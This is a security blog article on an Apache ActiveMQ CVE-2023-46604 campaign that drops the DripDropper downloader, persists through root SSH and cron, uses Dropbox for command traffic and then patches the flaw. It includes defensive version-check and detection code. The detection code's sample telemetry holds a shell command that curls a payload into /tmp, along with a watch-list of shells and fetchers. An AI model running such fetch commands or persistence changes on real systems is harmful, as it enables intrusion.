When Hackers Patch Your Servers: The Strange Case of CVE-2023-46604

It’s not often you see a cyberattack that ends with the attacker installing security updates. But that is exactly what is happening in the latest wave of Apache ActiveMQ exploitation, and it is as clever as it is concerning.

Researchers at Red Canary have documented a campaign in which threat actors exploit a critical vulnerability in Apache ActiveMQ to take control of cloud-hosted Linux systems. But once inside, instead of leaving the door wide open… they lock it.

By patching the same bug they used to break in, the attackers are not just claiming territory: they are protecting it from other criminals and hiding their method of entry from defenders.

CVE-2023-46604 – The Entry Point

At the center of it all is CVE-2023-46604, a remote code execution vulnerability in Apache ActiveMQ rated at the maximum CVSS score of 10.0. The flaw sits in the OpenWire protocol marshaller: a specially crafted OpenWire packet sent to the broker’s listener (port 61616 by default) can make the broker instantiate an arbitrary class on its classpath. Public exploits abuse this with Spring’s ClassPathXmlApplicationContext to load an attacker-hosted XML that spawns a shell command, so the attacker ends up running arbitrary commands as the broker’s service account.

Apache fixed the flaw in October 2023 in versions 5.15.16, 5.16.7, 5.17.6 and 5.18.3, but as always, unpatched brokers remain exposed, and threat actors are taking full advantage.
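The quickest triage for an exposed broker is the same trick scanners use: an OpenWire listener sends a WireFormatInfo command as soon as you connect, and its properties map advertises the ProviderVersion. The block below is an added example, not code from Red Canary or the ActiveMQ project: it parses a constructed, simplified WireFormatInfo frame (shaped like a real one, not a capture), extracts the version and compares it against the fixed releases named above. The frame layout, the sample version string and the network helper are assumptions made for the example.

```python
import re
import socket
from typing import Optional, Tuple

# Minimum fixed release on each supported 5.x line, from the Apache advisory
# for CVE-2023-46604 (5.15.16, 5.16.7, 5.17.6, 5.18.3).
FIXED_PATCH = {15: 16, 16: 7, 17: 6, 18: 3}

# In the broker's WireFormatInfo properties map the version is stored as a UTF
# key "ProviderVersion", a type byte (0x09 = string), then the UTF value.
_PROVIDER_VERSION = re.compile(rb"ProviderVersion.{0,3}?(\d+(?:\.\d+){1,3})", re.DOTALL)


def _utf(s: str) -> bytes:
    """OpenWire UTF string: 2-byte big-endian length followed by the bytes."""
    return len(s).to_bytes(2, "big") + s.encode()


def _build_sample_frame(version: str) -> bytes:
    """CONSTRUCTED sample: a simplified WireFormatInfo frame, shaped like what a
    broker sends on connect. It is example data, not a capture of a real broker."""
    props = (2).to_bytes(4, "big")                      # two map entries
    props += _utf("ProviderName") + b"\x09" + _utf("ActiveMQ")
    props += _utf("ProviderVersion") + b"\x09" + _utf(version)
    body = b"\x01"                                      # command type 1: WIREFORMAT_INFO
    body += b"ActiveMQ"                                 # protocol magic
    body += (12).to_bytes(4, "big")                     # OpenWire protocol version
    body += b"\x01" + len(props).to_bytes(4, "big") + props  # marshalled properties
    return len(body).to_bytes(4, "big") + body          # length-prefixed frame


SAMPLE_FRAME = _build_sample_frame("5.18.2")


def extract_provider_version(raw: bytes) -> Optional[str]:
    """Pull the advertised ActiveMQ version out of a raw WireFormatInfo frame."""
    if b"ActiveMQ" not in raw:
        return None
    m = _PROVIDER_VERSION.search(raw)
    return m.group(1).decode() if m else None


def is_vulnerable(version: str) -> bool:
    """True if the advertised version predates the fix for CVE-2023-46604."""
    nums = [int(p) for p in re.findall(r"\d+", version)[:3]]
    nums += [0] * (3 - len(nums))
    major, minor, patch = nums
    if major != 5:
        return major < 5          # everything before 5.15.16 is affected; 6.x ships fixed
    if minor < 15:
        return True
    if minor > 18:
        return False
    return patch < FIXED_PATCH[minor]


def assess(raw: bytes) -> Tuple[Optional[str], Optional[bool]]:
    """(advertised version, vulnerable?) for one frame; (None, None) if unparsable."""
    version = extract_provider_version(raw)
    if version is None:
        return None, None
    return version, is_vulnerable(version)


def fetch_wireformat_info(host: str, port: int = 61616, timeout: float = 5.0) -> bytes:
    """Connect to an OpenWire listener and read the WireFormatInfo it sends
    unsolicited on connect. Live network path, not used by the offline sample."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        return sock.recv(4096)


if __name__ == "__main__":
    print(assess(SAMPLE_FRAME))   # ('5.18.2', True) for the constructed sample
```

Treat the answer as a version check only. The banner says which release is installed, and since the operators described in this article apply the fix themselves, a broker that now reports 5.18.3 may have been exploited before it was patched. Pair the check with host telemetry rather than closing the ticket on a clean banner.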

Initially seen delivering HelloKitty ransomware, the GoTitan botnet and Godzilla web shells, the exploit has now been adopted for stealthier, more persistent intrusions.

DripDropper

In these new attacks, the exploit chain drops a custom downloader dubbed DripDropper, a PyInstaller-packed Linux ELF that will not run without a password, which frustrates sandboxing and analysis. It is not your typical malware in another way too: DripDropper talks to a Dropbox account rather than a purpose-built C2 server to receive instructions and fetch payloads.

Once active, it performs a variety of tasks:

  • Enables root SSH login by editing /etc/ssh/sshd_config (the PermitRootLogin directive), giving the attackers a second way in that survives an ActiveMQ patch.
  • Installs persistence through cron jobs dropped into /etc/cron.daily and similar directories.
  • Fetches additional files capable of monitoring processes or making further system changes.
  • Uses Dropbox for its C2 traffic, so the beaconing blends into ordinary outbound HTTPS.

The Final Stage: Patching the Vulnerability

Here’s the twist.

After establishing a foothold, the attackers download the official fix for CVE-2023-46604 straight from the Apache Maven repository and apply it to the broker they just exploited. Why? Because:

  • It stops other attackers from exploiting the same vulnerability and taking over the host.
  • It hides the method of entry: a broker that reports a patched version tells defenders and threat hunters the wrong story.
  • It ensures longevity, since the attackers already have alternative backdoors (root SSH, cron jobs, DripDropper) in place.
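Each behaviour listed in the DripDropper section and the self-patching step above leaves a host-level trace that can be matched without any ActiveMQ-specific signature. The block below is an added example and not Red Canary's or the author's detection content: it runs a handful of rules over constructed process, file and network events modelled on those behaviours. The event schema, the file names and the command lines are placeholders made up for the example, not captured indicators.

```python
from dataclasses import dataclass
from typing import List, Tuple

# Processes that legitimately rewrite sshd_config or drop cron entries;
# extend with your configuration-management tooling.
PACKAGE_MANAGERS = {"apt", "apt-get", "dpkg", "yum", "dnf", "rpm", "zypper"}
# Interpreters and fetchers a message broker has no business spawning.
SHELLS_AND_FETCHERS = {"sh", "bash", "dash", "curl", "wget", "python3", "perl"}
BROWSERS = {"firefox", "chrome", "chromium"}


@dataclass
class Event:
    ts: str
    kind: str            # "proc" (process start), "file" (file write) or "net" (outbound connection)
    image: str           # process image name
    parent: str = ""     # parent image, for "proc"
    cmdline: str = ""    # for "proc"
    path: str = ""       # for "file"
    dest: str = ""       # for "net"


# CONSTRUCTED sample telemetry modelled on the behaviours described in the
# article; file names and command lines are placeholders, not real indicators.
EVENTS = [
    Event("t1", "proc", image="sh", parent="java",
          cmdline='sh -c "curl -s -o /tmp/dd https://content.dropboxapi.com/2/files/download"'),
    Event("t2", "file", image="python3", path="/etc/ssh/sshd_config"),
    Event("t3", "file", image="python3", path="/etc/cron.daily/logrotate-check"),
    Event("t4", "net", image="python3", dest="api.dropboxapi.com"),
    Event("t5", "proc", image="wget", parent="java",
          cmdline="wget -q https://repo.maven.apache.org/maven2/org/apache/activemq/"
                  "activemq-client/5.18.3/activemq-client-5.18.3.jar"),
    Event("t6", "file", image="dpkg", path="/etc/ssh/sshd_config"),      # benign: package upgrade
    Event("t7", "net", image="firefox", dest="www.dropbox.com"),         # benign: a person using Dropbox
    Event("t8", "proc", image="sh", parent="cron", cmdline="sh /etc/cron.daily/logrotate"),  # benign
]


def detect(events: List[Event]) -> List[Tuple[str, str]]:
    """Return (rule name, event timestamp) for every rule an event matches.
    One event can match more than one rule."""
    hits = []
    for e in events:
        if e.kind == "proc" and e.parent == "java":
            # The OpenWire deserialization makes the broker's own JVM start the
            # process, so "java spawned a shell or fetcher" is the core signal.
            if e.image in SHELLS_AND_FETCHERS:
                hits.append(("broker-spawned-shell", e.ts))
            # The broker pulling its own fix from Maven is the self-patching step.
            if "repo.maven.apache.org" in e.cmdline and "activemq" in e.cmdline:
                hits.append(("broker-self-patch", e.ts))
        elif e.kind == "file" and e.image not in PACKAGE_MANAGERS:
            if e.path == "/etc/ssh/sshd_config":
                hits.append(("sshd-config-write", e.ts))
            elif e.path.startswith("/etc/cron"):
                hits.append(("cron-drop", e.ts))
        elif e.kind == "net" and e.image not in BROWSERS:
            # The API hostnames are what a script uses; people use www.dropbox.com.
            if e.dest.endswith(".dropboxapi.com"):
                hits.append(("dropbox-api-c2", e.ts))
    return hits


def flagged_timestamps(events: List[Event]) -> List[str]:
    """Sorted, de-duplicated timestamps of events that matched any rule."""
    return sorted({ts for _, ts in detect(events)})


if __name__ == "__main__":
    for rule, ts in detect(EVENTS):
        print(f"{ts}: {rule}")
```

The broker-spawned-shell rule is the one to alert on immediately: a Java message broker starting sh, curl or wget is abnormal regardless of which CVE was used, and it fires even after the attackers have patched the broker. The sshd_config and cron rules need an allowlist tuned to your configuration-management tooling, otherwise routine package upgrades (t6 in the sample) will drown the signal.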

It’s like robbing a house, installing a new security system, and keeping the only key.

Not the First Time

While rare, this tactic isn’t unheard of. In July 2025, France’s national cybersecurity agency (ANSSI) reported similar behaviour by a China-linked initial access broker that exploited vulnerabilities to get in and then patched them to stay quietly embedded.

It’s a stark reminder: attackers are evolving from smash-and-grab operations into long-term occupiers.

Conclusion

Security isn’t just about building walls, it’s about knowing who is already inside them. The DripDropper campaign is a clear example of attackers thinking several steps ahead: exploiting a vulnerability, securing their own access, blending into normal traffic, and covering their tracks by closing the door behind them.

In a world where malware downloads patches and uses Dropbox as a C2 hub, a clean version banner is no longer proof that a host is clean. If the bad guys are updating your systems before you are, the real problem isn’t the exploit, it’s the delay.

Francesco Marotta
